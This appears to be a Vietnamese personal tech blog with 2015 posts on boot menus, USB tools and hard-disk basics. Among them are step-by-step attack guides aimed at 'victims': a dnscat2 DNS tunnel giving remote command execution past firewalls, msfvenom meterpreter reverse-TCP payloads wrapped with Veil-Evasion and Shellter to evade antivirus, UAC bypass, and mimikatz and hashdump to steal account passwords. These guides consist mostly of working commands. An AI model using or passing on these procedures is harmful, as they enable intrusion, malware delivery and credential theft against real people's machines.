Thứ Ba, 14 tháng 7, 2015

Tạo Menu Boot Với BCDEDIT.

Từ windows 7 trở lên bootmgr thay cho boot.ini, để tạo và chỉnh sửa menu boot giờ đây rắc rối hơn so với trước đây(trừ khi sử dụng phần mền)
Để chỉnh sửa menu boot theo ý mình mà không cần cài phần mềm, thì chúng ta sử dụng bcdedit để làm như sau:
1. xem trong boot đã có những gì

Hiện đã có menuboot
Default đang là {current} nghĩa là windows 8.1 sẽ được boot tự động nếu trong khoảng thời gian 30 giây không nhấn enter(nếu mình set default xem mục thứ 7)
Displayorder đang có 2 id, nghĩa là trong menu boot sẽ có 2 dòng, dòng đầu tiên là windows 8.1 dòng thứ hai là windows 7.
2. sao lưu lại trước khi chỉnh sửa.
3. khôi phục lại nếu bị sai trong quá trình sửa
4. nếu muốn thêm 1 os mới vào menu boot thì dùng lệnh copy để cop từ thiết lập có sẵn, sau đó chỉnh sửa lại.
Sẽ xuất hiện thêm 1 thiết lập mới y chan cái cũ
Và tự động thêm vào boot manager
 5. nếu muốn xóa thiết lập đó
Nếu cẩn thận hơn thì thêm /cleanup để xóa sạch luôn khỏi boot manager
6. thiết lập các thông số cho 1 os để boot.
Set phân vùng chứa os bcdedit /set {1a1b70e7-2b1b-11e5-8351-3085a9f024c5} device partition=H:

Tương tự như vậy, muốn thiết lập thông số cho os nào thì chỉ việc chọn thông số đó rồi thay đổi thôi.
Lưu ý, đối với thiết lập cho win xp thì khác các thông số cấu hình, nhưng vẫn sử dụng các câu lệnh đó.
7. nếu muốn sau khi hết thời gian chờ máy sẽ boot os nào thì ta dùng lệnh default
Sau khi hết 30s thì máy sẽ boot win 7.
8. muốn tạo mới hoàn toàn thì dùng create
9. để hiển thị trong boot manager thì dùng displayorder
10. ví dụ hoàn chỉnh
Giả sử ban đầu không tồn tại menu boot nào cả.
10.1 tạo menu boot bằng lệnh
Bcdedit /creat {bootmgr}
Bcdedit /displayorder {bootmgr} /addfirst
Bcdedit
Bcdedit /set “các thông số còn lại theo mẫu
đó hai thông số chỗ displayorder ta điền vào sau khi tạo các phần boot manager cho các os”
10.2 tiếp đến là tạo các boot cho os như mục 8 và 9

Tương tự như vậy ta sẽ set các giá trị theo mẫu
 thì mẫu trên, win 7 thì mẫu dưới, riêng chỗ device và osdevice phải xác định chính xác phân vùng cài os, và điền vào partition=D:…..(giả sử là ổ D)
  
Trên đây là những lệnh cơ bản nhất để tạo một menu boot. Ngoài ra còn khá nhiều các option khác, mọi lệnh đều có ví dụ trong phần help, bằng cách bcdedit /? Để xem các option hỗ trợ. Mỗi option ta đều xem được ví dụ và option con bằng cách bcdedit /option /? ….cứ như vậy, sẽ làm được nhiều cái khác nữa.

Một cách để kiểm tra thiết bị lưu trữ có phải là đồ giả hay không

1. Download phần mềm h2testw.zip
2. Chạy phần mềm lên, chọn thiết bị lưu trữ cần kiểm tra, nhớ là phải format trước khi làm.
3. Click vào Write + Verify và chờ
4. Nếu kết quả không có lỗi nào thì thiết bị đó không phải là đồ lừa đảo.

dnscat2 tạo đường hầm truyền dữ liệu bypass firewall

1. trên máy chủ linux, có khả năng truy cập được internet.
2. máy chủ chạy ubuntu, sử dụng quyền root, chạy các lệnh sau:
# apt-get update
# apt-get -y install ruby-dev git make g++
# gem install bundler
# git clone https://github.com/iagox86/dnscat2.git
# cd dnscat2/server
# bundle install
3. di chuyển đến folder vừa cài, chạy lệnh
            # ruby ./dnscat2.rb (# ruby ./dnscat2.rb abc.com //nếu có đăng ký một tên miền, có tên miền thường nhằm mục đích dễ đánh lừa firewall hơn)
            sau khi chạy dnscat2 server thì trên server sẽ lắng nghe trên port 53, lắng nghe phản hồi từ dnscat2 client từ nạn nhân
4. nếu máy nạn nhân chạy windows, chúng ta download dnscat2 client tại đây
5. trên máy windows nạn nhân chạy lệnh
(dnscat2-win32.exe abc.com)
 Trong đó địa chỉ ip trên là địa chỉ của dnscat2 server.
6. ngay sau nạn nhân chạy lệnh trên, thì bên dnscat2 server sẽ thông báo rằng đã nhận được kết nối từ nạn nhân
# ruby ./dnscat2.rb (# ruby ./dnscat2.rb abc.com)
Starting Dnscat2 DNS server on 0.0.0.0:53 [domains = n/a]...
No domains were selected, which means this server will only respond to direct queries (using --host and --port on the client)
dnscat2> New session established: 16059
dnscat2>
7. lúc này kẻ tấn công đã kiểm soát được máy nạn nhân, và có thể thực thi lệnh tùy ý ví dụ như chạy notepad…
dnscat2> session -i 16059
Welcome to a command session!
Use 'help' for a list of commands or ^z for the main menu
dnscat [command: 16059]> exec notepad.exe
Sent request to execute
dnscat [command: 16059]>
dnscat2 còn hỗ trợ download, upload file đến máy nạn nhân.
Lúc này nếu chúng ta bật wireshark lên để kiểm tra sẽ thấy, mỗi một truy vân dns đều kèm theo một số các lưu lượng không bình thường trong đó, chính vì vậy mà đã qua mặt được firewall(đa số các firewall đều cho truy vấn và nhận phản hồi dns)
8. Cách phòng chống:
Chúng ta có thể hạn chế bớt lưu lượng truyền đi trên một đơn vị thời gian nào đó, chỉ cho phép các truy vấn và nhận phản hồi dns đến các hệ thống dns đáng tin cậy

Thứ Năm, 9 tháng 7, 2015

Burp suite Công cụ bảo mật đặc chủng

Phần 1

Phần 2

Phần 3

Hiển thị mật khẩu máy tính từ xa

1.
msfvenom -p windows/meterpreter/reverse_tcp LHOST="ip attracker" LPORT="port lắng nghe" -f exe > /root/Desktop/crack.exe
2. download veil-Evasion về, sau đó chạy nó lên. cái này để bypass AV.
3. list để xem danh sách các kiểu khai thác
4. use 14 để chọn native/backdoor_factory.
5. thực hiện các lệnh sau:
set LHOST “ip attracker”
set LPORT “cổng lắng nghe”
set orig_exe /root/Desktop/crack.exe
generate

6. nhấn enter sẽ thấy một số file được tạo ra dạng như thế này:

7. copy file payload.exe ra khỏi màn hình, sau đó mở metasploit
8. 
use exploit/multi/handler
Set PAYLOAD windows/meterpreter/reverse_tcp
Set LHOST “ip attracker”
Set LPORT “cổng lắng nghe”
Exploit
9. gửi file payload.exe cho nạn nhân, khi nó chạy thì mình khai thác thành công.
10. hashdump
11. background
use exploit windows/local/bypassuac_injection
set SESSION 1
set LHOST “ip attracker”
exploit
16. đến đây thì đã xong, nhưng có cái mimikatz này lạ lạ,
17. load mimikatz
18. help mimikatz để xem hướng dẫn
19. thử 1 cái xem
msv
Hiện ra được tất cả các tài khoản có cả password của máy nạn nhân, nhưng ở dạng hash LM hoặc NTLM, giờ thì chỉ việc giải mã hash đó là xong.
Hoặc dùng lệnh 
kerberos 
để hiển thị luôn password.

Một cách lock folder không có gì là mới, nhưng cũng dui.

Copy hết cục ni paste vô notepad, lưu với file .bat, rồi test thử thôi.
if EXIST "Control Panel.{21EC2020-3AEA-1069-A2DD-08002B30309D}" goto UNLOCK
if NOT EXIST Locker goto MDLOCKER
:CONFIRM
echo Are you sure u want to Lock the folder(Y/N)
set/p "cho=>"
if %cho%==Y goto LOCK
if %cho%==y goto LOCK
if %cho%==n goto END
if %cho%==N goto END
echo Invalid choice.
goto CONFIRM
:LOCK
ren Locker "Control Panel.{21EC2020-3AEA-1069-A2DD-08002B30309D}"
attrib +h +s "Control Panel.{21EC2020-3AEA-1069-A2DD-08002B30309D}"
echo Folder locked
goto End
:UNLOCK
echo Enter password to Unlock folder
set/p "pass=>"
if NOT %pass%==type your password here goto FAIL
attrib -h -s "Control Panel.{21EC2020-3AEA-1069-A2DD-08002B30309D}"
ren "Control Panel.{21EC2020-3AEA-1069-A2DD-08002B30309D}" Locker
echo Folder Unlocked successfully
goto End
:FAIL
echo Invalid password
goto end
:MDLOCKER
md Locker
echo Locker created successfully
goto End

:End

Thứ Ba, 7 tháng 7, 2015

Boot nhiều hệ điều hành trên 1 usb

1. Truy cập link http://www.liveusb.info/multisystem/depot để biết source....
2. apt-get update
3. apt-get install multisystem
4. leafpad /usr/local/share/multisystem/gui_multisystem.sh

Thêm dấu # ở chỗ:

5. chạy multisystem
6. chọn usb rồi click confirm
7. tại tab ms của multisystem kéo file iso mà mình muốn tạo vào, và chờ cho nó chạy xong, 

tương tự có thể add thêm file iso của các os khác vào. Vậy là có 1 usb boot nhiều os…

Bypass antivirus sử dụng shellter trên kalilinux

Các bước thực hiện:
1. chuẩn bị một file thực thi .exe, để trong một thư mục hoặc ngoài màn hình, di chuyển đến thư mục đó và làm các bước kế tiếp.
2. apt-get update
3. apt-get install shellter
4. mở metasploit bằng lệnh msfconsole.
5 use payload/windows/meterpreter/reverse_tcp
6. set LHOST là ip máy attracker
7. thích thì set luôn lport
8. show encoders để lựa chọn “ứng dụng” để thực hiện “xáo trộn” code
9. generate –e x86/shikata_ga_nai –t raw –f met . lúc này sẽ có 1 file có tên là met được tạo ra
10. use exploit/multi/handler
11. set PAYLOAD windows/meterpreter/reverse_tcp
12. set LHOST
13. set LPORT
14. exploit
15 di chuyển đến thư mục có chứa file exe(nếu hiện tại chưa ở đúng vị trí) và chạy lệnh  Shellter. Shellter sẽ được mở lên dưới dạng cli
16. a
17. điền tên file mã độc .exe, quá trình sẽ tạo ra thêm file bak và file .dll
18. met , nếu kết thúc mà báo lỗi thì quay lại bước 15 và làm lại.
19 sau khi chạy xong, file exe đó bây giờ đã bị dính mã độc, gửi nó cho nạn nhân, khi được thực thi ở máy nạn nhân thì quá trình khai thác ở meta thành công.
Note: sau một thời gian, các phần mềm AV đã được cập nhật, và chỉnh sửa thì sẽ nhận biết được, nên không còn giá trị hữu dụng nữa, và chúng ta nên tìm một cách khác hay hơn.

Thứ Hai, 6 tháng 7, 2015

4 cách để giải quyết khi usb bị Write Protection

1. Registry.

copy cái này vào notepad và lưu lại thành file .bat, để chạy khi cần.
    cd\reg add “HKLM\System\CurrentControlSet\Control\StorageDevicePolicies” /t Reg_dword /v
WriteProtect /f /d 0
khi chạy file xong phải reboot mới được
hoặc có thể vào trực tiếp registry mà sửa. giá trị writeprotect từ 1 thành 0.

2.  Nếu bị nhiễm virus 9u.exe (là loại virus làm cho thiết bị lưu trữ của mình bị lỗi như vậy).
- Tải OnLineRecovery.exe về, và chạy nó lên.
- Xác định dung lượng cho thiết bị lưu trữ.
- Chọn “repair and erase all data” hoặc ” repair and keep existing data”
- Bấm start.

3. Dùng diskpart trong windows để fix.
  Run-->diskpart-->list volume--> select volume ...--> attributes disk clear readonly.
4. Dùng policy.
vào gpedit-->Computer Configuration -> Administrative Templates -> System -> Removable Storage Access. Sau đó chọn enable
Removable Disks: Deny execute access
Removable Disks: Deny read access
Removable Disks: Deny write access   

Thứ Sáu, 3 tháng 7, 2015

Tổng quan về ổ đĩa cứng


1. Lịch sử
    Ổ cứng đầu tiên trên thế giới có là IBM 350 Disk File được chế tạo bởi Reynold Johnson ra mắt năm 1955 cùng máy tính IBM 305. Ổ cứng này có tới 50 tấm đĩa kích thước 24" với tổng dung lượng là 5 triệu kí tự. Một đầu từ được dùng để truy nhập tất cả các tấm đĩa khiến cho tốc độ truy nhập trung bình khá thấp.
2. Cấu tạo

Cụm đĩa: Bao gồm toàn bộ các đĩa, trục quay và động cơ.
Cụm đầu đọc: Đầu đọc/ghi và Cần di chuyển đầu đọc
Cụm mạch điện: gồm:
-       Mạch điều khiển.
-       Mạch xử lý dữ liệu.
-       Bộ nhớ đệm (cache hoặc buffer).
-       Đầu cắm nguồn cung cấp điện cho ổ đĩa cứng.
-       Đầu kết nối giao tiếp với máy tính.
-       Các cầu đấu thiết đặt (tạm dịch từ jumper) thiết đặt chế độ làm việc của ổ đĩa cứng.
Vỏ đĩa cứng: định vị các linh kiện và đảm bảo độ kín khít để không cho phép bụi được lọt vào bên trong của ổ đĩa cứng, chịu đựng sự va chạm (ở mức độ thấp) để bảo vệ ổ đĩa cứng. Do đầu từ chuyển động rất sát mặt đĩa nên nếu có bụi lọt vào trong ổ đĩa cứng cũng có thể làm xước bề mặt, mất lớp từ và hư hỏng từng phần (xuất hiện các khối hư hỏng (bad block))... Thành phần bên trong của ổ đĩa cứng là không khí có độ sạch cao, để đảm bảo áp suất cân bằng giữa môi trường bên trong và bên ngoài, trên vỏ bảo vệ có các hệ lỗ thoáng đảm bảo cản bụi và cân bằng áp suất.
Đĩa từ: Đĩa thường cấu tạo bằng nhôm hoặc thuỷ tinh, trên bề mặt được phủ một lớp vật liệu từ tính là nơi chứa dữ liệu, lớp từ đó có thể được phủ ở cả hai mặt đĩa, đĩa cứng có thể có nhiều đĩa từ, chúng gắn song song, quay đồng trục, cùng tốc độ với nhau khi hoạt động.
Track: là nhiều vòng tròn đồng tâm trên mặt đĩa, không phải là các dạng xoắn ốc như trên đĩa nhựa, Track trên ổ đĩa cứng không cố định từ khi sản xuất, chúng có thể thay đổi vị trí khi định dạng cấp thấp ổ đĩa. Một ổ đĩa cứng đã hoạt động quá nhiều năm liên tục, khi kết quả kiểm tra bằng các phần mềm cho thấy xuất hiện nhiều khối hư hỏng (bad block) thì có nghĩa là phần cơ của nó đã rơ rão và làm việc không chính xác như khi mới sản xuất, lúc này thích hợp nhất là format cấp thấp cho nó để tương thích hơn với chế độ làm việc của phần cơ.
Sector: Track là một vòng tròn hướng tâm, nhưng vòng trong đó không liền nhau, mà là những nén đứt, mỗi nét đứt đó gọi là sector, 1 sector chứ dung lượng 512byte.
Cylinder: là tập hợp các track mà tại đó đầu đọc/ghi đang đọc.
Trục quay: là một trục để gắn đĩa từ lên, trục này được gắn trực tiếp với động cơ để quay đĩa, trục này được làm bởi hợp kim nhôm, nhẹ, đặc biệc trọng tâm của nó phải chính xác chứ không khi quay ở tốc độ cao là sẽ bị rung lắc dẫn đến việc đọc/ghi không chính xác.
Đầu đọc/ghi: được làm từ lõi ferit và cuộn dây, hoạt động như một nam châm điện, nó được đặt rất sát với mặt đĩa, để đọc dữ liệu dưới dạng từ hóa, hoặc từ hóa lên đĩa khi ghi.
Cần di chuyển đầu đọc/ghi: là nơi mà đầu đọc/ghi được gắn trên đó, nó di chuyển để đưa đầu đọc/ghi đến những vị trí khác nhau trên đĩa để thực hiện nhiệm vụ của đầu đọc/ghi.
3.Nguyên tắc hoạt động.
    - Mọi yêu cầu từ OS máy tính đến ổ cứng đều phải qua bo mạch điều khiển trung gian.
    - Do tính chất làm việc của máy tính, không theo một trình tự nào cả, lúc thì nó làm việc này, khi thì nó làm việc kia, chưa kể đến tính đa nhiệm, bởi vậy mà một thời điểm luôn luôn xảy ra quá trình đọc/ghi dữ liệu lên mặt đĩa(mặt đĩa được phủ một lớp từ tính có tác dụng để lưu dưc liệu), và 1 dữ liệu a không được lưu một chỗ mà nằm rải rác tại các vị trí khác nhau trên mặt đĩa. Do đó việc đọc/ghi không theo một trình tự như là trên đĩa mềm.
    - Khi thực hiện một tác vụ nào đó, CPU phải yêu cầu dữ liệu từ ổ cứng, việc yêu cầu này được ổ cứng đáp ứng một cách tuần tự hoặc thông qua bộ nhớ đệm kết hợp với  một cách riêng nào đó tùy vào công nghệ, cách thứ hai này giúp tăng tốc độ cho toàn hệ thống.
    - Đầu đọc/ghi dữ liệu được cần di chuyển đưa đi theo phương bán kính của mặt đĩa trong khi đĩa từ đó quay rất nhanh đơn vị đo tốc độ này là rpm(vòng trên phút), việc phân bổ dữ liệu lên mặt đĩa thì lại nhờ vào bo mạch trên ổ cứng đó làm việc.
    - S.M.A.R.T (Self-Monitoring, Analysis, and Reporting Technology) là công nghệ tự động giám sát, chẩn đoán và báo cáo các hư hỏng có thể xuất hiện của ổ đĩa cứng để thông qua BIOS, các phần mềm thông báo cho người sử dụng biết trước sự hư hỏng để có các hành động chuẩn bị đối phó. Có thể bật hoặc tắt tính năng này trong bios.
4. Ổ cứng lai (hybrid hard disk drive) là các ổ đĩa cứng thông thường được gắn thêm các phần bộ nhớ flash trên bo mạch của ổ đĩa cứng. Cụm bộ nhớ này hoạt động khác với cơ chế làm việc của bộ nhớ đệm (cache) của ổ đĩa cứng: Dữ liệu chứa trên chúng không bị mất đi khi mất điện.
Trong quá trình làm việc của ổ cứng lai, vai trò của phần bộ nhớ flash như sau:
+ Lưu trữ trung gian dữ liệu trước khi ghi vào đĩa cứng, chỉ khi máy tính đã đưa các dữ liệu đến một mức nhất định (tuỳ từng loại ổ cứng lai) thì ổ đĩa cứng mới tiến hành ghi dữ liệu vào các đĩa từ, điều này giúp sự vận hành của ổ đĩa cứng tối hiệu quả và tiết kiệm điện năng hơn nhờ việc không phải thường xuyên hoạt động.
+ Giúp tăng tốc độ giao tiếp với máy tính: Việc đọc dữ liệu từ bộ nhớ flash nhanh hơn so với việc đọc dữ liệu tại các đĩa từ.
+ Giúp hệ điều hành khởi động nhanh hơn nhờ việc lưu các tập tin khởi động của hệ thống lên vùng bộ nhớ flash.
+ Kết hợp với bộ nhớ đệm của ổ đĩa cứng tạo thành một hệ thống hoạt động hiệu quả.

5. Dung lượng ổ đĩa cứng được tính bằng: (số byte/sector) × (số sector/track) × (số cylinder) × (số đầu đọc/ghi). Đa số các hãng sản xuất đều tính dung lượng theo cách có lợi (theo cách tính 1 GB = 1000 MB mà thực ra phải là 1 GB = 1024 MB) nên dung lượng mà hệ điều hành (hoặc các phần mềm kiểm tra) nhận ra của ổ đĩa cứng thường thấp hơn so với dung lượng ghi trên nhãn đĩa.
6. Các tốc độ quay thông dụng thường là:
+ 3.600 rpm: Tốc độ của các ổ đĩa cứng đĩa thế hệ trước.
+ 4.200 rpm: Thường sử dụng với các máy tính xách tay mức giá trung bình và thấp trong thời điểm 2007.
+ 5.400 rpm: Thông dụng với các ổ đĩa cứng 3,5" sản xuất cách đây 2-3 năm; với các ổ đĩa cứng 2,5" cho các máy tính xách tay hiện nay đã chuyển sang tốc độ 5400 rpm để đáp ứng nhu cầu đọc/ghi dữ liệu nhanh hơn.
+ 7.200 rpm: Thông dụng với các ổ đĩa cứng sản xuất trong thời gian hiện tại (2007)
+ 10.000 rpm, 15.000 rpm: Thường sử dụng cho các ổ đĩa cứng trong các máy tính cá nhân cao cấp, máy trạm và các máy chủ có sử dụng giao tiếp SCSI
7. Các thông số về thời gian trong ổ đĩa cứng
-       Thời gian tìm kiếm trung bình
Thời gian tìm kiếm trung bình (Average Seek Time) là khoảng thời gian trung bình (theo mili giây: ms) mà đầu đọc có thể di chuyển từ một cylinder này đến một cylinder khác ngẫu nhiên (ở vị trí xa chúng). Thời gian tìm kiếm trung bình được cung cấp bởi nhà sản xuất khi họ tiến hành hàng loạt các việc thử việc đọc/ghi ở các vị trí khác nhau rồi chia cho số lần thực hiện để có kết quả thông số cuối cùng.
Thông số này càng thấp càng tốt.
-      Thời gian truy cập ngẫu nhiên
Thời gian truy cập ngẫu nhiên (Random Access Time): Là khoảng thời gian trung bình để đĩa cứng tìm kiếm một dữ liệu ngẫu nhiên. Tính bằng mili giây (ms).
Đây là tham số quan trọng do chúng ảnh hưởng đến hiệu năng làm việc của hệ thống, do đó người sử dụng nên quan tâm đến chúng khi lựa chọn giữa các ổ đĩa cứng. Thông số này càng thấp càng tốt.
-      Thời gian làm việc tin cậy

Thời gian làm việc tin cậy MTBF: (Mean Time Between Failures) được tính theo giờ (hay có thể hiểu một cách đơn thuần là tuổi thọ của ổ đĩa cứng). Đây là khoảng thời gian mà nhà sản xuất dự tính ổ đĩa cứng hoạt động ổn định mà sau thời gian này ổ đĩa cứng có thể sẽ xuất hiện lỗi (và không đảm bảo tin cậy).
8.Bộ nhớ đệm
Bộ nhớ đệm (cache hoặc buffer) trong ổ đĩa cứng cũng giống như RAM của máy tính, chúng có nhiệm vụ lưu tạm dữ liệu trong quá trình làm việc của ổ đĩa cứng. Hệ điều hành cũng có thể lấy một phần bộ nhớ của hệ thống (RAM) để tạo ra một bộ nhớ đệm lưu trữ dữ liệu được lấy từ ổ đĩa cứng nhằm tối ưu việc xử lý đối với các dữ liệu thường xuyên phải truy cập, đây chỉ là một cách dùng riêng của hệ điều hành mà chúng không ảnh hưởng đến cách hoạt động hoặc hiệu suất vốn có của mỗi loại ổ đĩa cứng. Có rất nhiều phần mềm cho phép tinh chỉnh các thông số này của hệ điều hành tuỳ thuộc vào sự dư thừa RAM trên hệ thống.
9. Chuẩn giao tiếp



10. Tốc độ truyền dữ liệu
Các thông số sau ảnh hưởng đến tốc độ truyền dữ liệu của ổ đĩa cứng:
+ Tốc độ quay của đĩa từ.
+ Số lượng đĩa từ trong ổ đĩa cứng: bởi càng nhiều đĩa từ thì số lượng đầu đọc càng lớn, khả năng đọc/ghi của đồng thời của các đầu từ tại các mặt đĩa càng nhiều thì lượng dữ liệu đọc/ghi càng lớn hơn.
+ Công nghệ chế tạo: Mật độ sít chặt của các track và công nghệ ghi dữ liệu trên bề mặt đĩa (phương từ song song hoặc vuông góc với bề mặt đĩa): dẫn đến tốc độ đọc/ghi cao hơn.
+ Dung lượng bộ nhớ đệm: Ảnh hưởng đến tốc độ truyền dữ liệu tức thời trong một thời điểm.
11. Kích thước
Kích thước ổ đĩa cứng thường được tính theo inch
12.Sự sử dụng điện năng
- Đa số các ổ đĩa cứng của máy tính cá nhân sử dụng hai loại điện áp nguồn: 5 Vdc và 12 Vdc (DC hoặc dc: Loại điện áp một chiều).
- Ổ đĩa cứng thường tiêu thụ điện năng lớn nhất tại thời điểm khởi động của hệ thống
13. Độ ồn
- Đơn vị tính độ ồn là db.
- Thông số này không quan trọng khi mua ổ cứng.
- Những tiếng "lắc tắc" nhỏ phát ra trong quá trình làm việc của ổ cứng một cách không đều đặn được sinh ra bởi cần đỡ đầu đọc/ghi di chuyển và dừng đột ngột tại các vị trí cần định vị để làm việc. Âm thanh này có thể giúp người sử dụng biết được trạng thái làm việc của ổ đĩa cứng mà không cần quan sát đèn trạng thái HDD.
14. Chu trình di chuyển
- Chu trình di chuyển của cần đọc/ghi (Load/Unload cycle) được tính bằng số lần chúng khởi động từ vị trí an toàn đến vùng làm việc của bề mặt đĩa cứng và ngược lại.
- Sau mỗi phiên làm việc (tắt máy), các đầu từ được di chuyển đến một vị trí an toàn nằm ngoài các đĩa từ nhằm tránh sự va chạm có thể gây xước bề mặt lớp từ tính, một số ổ đĩa có thiết kế cần di chuyển đầu đọc tự động di chuyển về vị trí an toàn sau khi ngừng cấp điện đột ngột. Nhiều người sử dụng năng động có thói quen ngắt điện trong một phiên làm việc trên nền DOS (bởi không có sự tắt máy chính thống) rồi tháo ổ đĩa cứng cho các công việc khác, quá trình di chuyển có thể gây va chạm và làm xuất hiện các khối hư hỏng (bad block).
15. Chịu đựng sốc.
Với các ổ cứng cho máy tính xách tay hoặc các thiết bị kỹ thuật số hỗ trợ cá nhân hay các ổ đĩa cứng ngoài thì thông số này càng cao càng tốt, với các ổ đĩa cứng gắn cho máy tính cá nhân để bàn thì thông số này ít được coi trọng khi so sánh lựa chọn giữa các loại ổ cứng bởi chúng đã được gắn cố định nên hiếm khi xảy ra sốc.
16. Nhiệt độ
- Nhiệt độ khi hoạt động là khoảng 40 độ c.
- Trên vỏ ổ cứng thường có một lỗ nhỏ để thông thoáng và cân bằng áp suất cho ổ cứng, nhưng đảm bảo cản được các hạt trong không khí, bởi bên trong nó là một môi trương không khí sạch.
- Ổ cứng mà ở những môi trường có nhiệt độ và độ ẩm không đảm bảo, có thể làm ngưng tụ hơi nước, nếu ta sử dụng ngay mà không làm ấm vật lý trước, thì dễ làm hỏng ổ cứng, khi mới mua ổ cứng, chúng ta nên thảo vỏ bảo vệ, rồi để một chút bên ngoài, rồi hãy bật lên dùng.
17. Phân vùng
- Là vùng mà chứa các cylinder gần nhau.
- Phân vùng để dễ dàng thao tác và quản lý dữ liệu trên ổ cứng hơn
- Phân vùng chứa hệ điều hành chính: Thường nên thiết lập phân vùng chứa hệ điều hành tại các vùng chứa phía ngoài rìa của đĩa từ (outer zone) bởi vùng này có tốc độ đọc/ghi cao hơn, dẫn đến sự khởi động hệ điều hành và các phần mềm khởi động và làm việc được nhanh hơn.
18. Định dạng của phân vùng.
- FAT (File Allocation Table): Chuẩn hỗ trợ DOS và các hệ điều hành họ Windows 9X/Me (và các hệ điều hành sau). Phân vùng FAT hỗ trợ độ dài tên 11 ký tự (8 ký tự tên và 3 ký tự mở rộng) trong DOS hoặc 255 ký tự trong các hệ điều hành 32 bit như Windows 9X/Me. FAT có thể sử dụng 12 hoặc 16 bit, dung lượng tối đa một phân vùng FAT chỉ đến 2 GB dữ liệu.
- FAT32 (File Allocation Table, 32-bit): Tương tự như FAT, nhưng nó được hỗ trợ bắt đầu từ hệ điều hành Windows 95 OSR2 và toàn bộ các hệ điều hành sau này. Dung lượng tối đa của một phân vùng FAT32 có thể lên tới 2 TB (2.048 GB).
- NTFS (Windows New Tech File System): Được hỗ trợ bắt đầu từ các hệ điều hành họ NT/2000/XP/Vista. Một phân vùng NTFS có thể có dung lượng tối đa đến 16 exabytes.
- exFAT (extended File Allocation Table): được thiết kế đặc biệt cho các ổ flash USB.
19. Format cấp thấp.
Format cấp thấp (low-level format) là sự định dạng lại các track, sector, cylinder (bao gồm cả các ‘khu vực" đã trình bày trong phần sector). Format cấp thấp thường được các hãng sản xuất thực hiện lần đầu tiên trước khi xuất xưởng các ổ đĩa cứng. Người sử dụng chỉ nên dùng các phần mềm của chính hãng sản xuất để format cấp thấp (cũng có các phần mềm của hãng khác nhưng có thể các phần mềm này không nhận biết đúng các thông số của ổ đĩa cứng khi tiến hành định dạng lại).
Khi các ổ cứng đã làm việc nhiều năm liên tục hoặc có các khối hư hỏng xuất hiện nhiều, điều này có hai khả năng: sự lão hoá tổng thể hoặc sự rơ rão của các phần cơ khí bên trong ổ đĩa cứng. Cả hai trường hợp này đều dẫn đến một sự không đáng tin cậy khi lưu trữ dữ liệu quan trọng trên nó, do đó việc định dạng cấp thấp có thể kéo dài thêm một chút thời gian làm việc của ổ đĩa cứng để lưu các dữ liệu không mấy quan trọng. Format cấp thấp giúp cho sự đọc/ghi trên các track đang bị lệch lạc trở thành phù hợp hơn khi các track đó được định dạng lại (có thể hiểu đơn giản rằng nếu đầu đọc/ghi bắt đầu làm việc dịch về một biên phía nào đó của track thì sau khi format cấp thấp các đầu đọc/ghi sẽ làm việc tại tâm của các track mới).

Không nên lạm dụng format cấp thấp nếu như ổ đĩa cứng của bạn đang hoạt động bình thường bởi sự định dạng lại này có thể mang lại sự rủi ro: Sự thao tác sai của người dùng, các vấn đề xử lý trong bo mạch của ổ đĩa cứng. Nếu như một ổ đĩa cứng xuất hiện một vài khối hư hỏng thì người sử dụng nên dùng các phần mềm che giấu nó bởi đó không chắc đã do sự hoạt động rơ rão của phần cứng.